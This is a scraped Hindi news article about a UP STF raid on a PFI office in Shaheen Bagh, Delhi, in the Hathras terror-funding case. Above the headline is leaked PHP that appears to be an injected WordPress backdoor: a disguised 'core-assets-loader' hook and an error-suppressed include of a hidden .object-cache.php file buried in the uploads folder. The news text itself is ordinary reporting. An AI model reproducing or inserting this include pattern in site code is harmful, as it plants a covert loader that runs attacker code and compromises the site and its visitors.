add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Hathras Terror Funding Case: दिल्ली के शाहीन बाग PFI दफ्तर पर यूपी STF का छापा, रउफ से पूछताछ के बाद एक्शन – SOCH INDIA
Menu

देश
Hathras Terror Funding Case: दिल्ली के शाहीन बाग PFI दफ्तर पर यूपी STF का छापा, रउफ से पूछताछ के बाद एक्शन

nobanner

हाथरस में दंगा भड़काने के लिए हुई टेरर फंडिंग के मामले में उत्तर प्रदेश स्पेशल टास्क फोर्स (UP STF) ने दिल्ली के शाहीनबाग में पॉपुलर फ्रंट ऑफ इंडिया (PFI) के दफ्तर पर छापेमारी की.

बता दें कि यूपी एसटीएफ ने रउफ शरीफ से पूछताछ के बाद पॉपुलर फ्रंट ऑफ इंडिया (PFI) के दिल्ली दफ्तर में छापेमारी की. यूपी एसटीएफ पीएफआई के दिल्ली दफ्तर के अलावा अन्य ठिकानों पर भी रेड कर रही है.

जान लें कि यूपी एसटीएफ पॉपुलर फ्रंट ऑफ इंडिया (PFI) स्टूडेंट विंग के रउफ शरीफ को केरल से प्रॉडक्शन वारंट पर लेकर आई है. रउफ हाथरस में दंगा भड़काने के लिए टेरर फंडिंग और उत्तर प्रदेश में CAA/NRC प्रोटेस्ट के दौरान हिंसा की साजिश और फंडिंग का आरोपी है.

गौरतलब है कि रउफ शरीफ को बीते गुरुवार को मथुरा कोर्ट ने 5 दिन की न्यायिक हिरासत में भेज दिया था.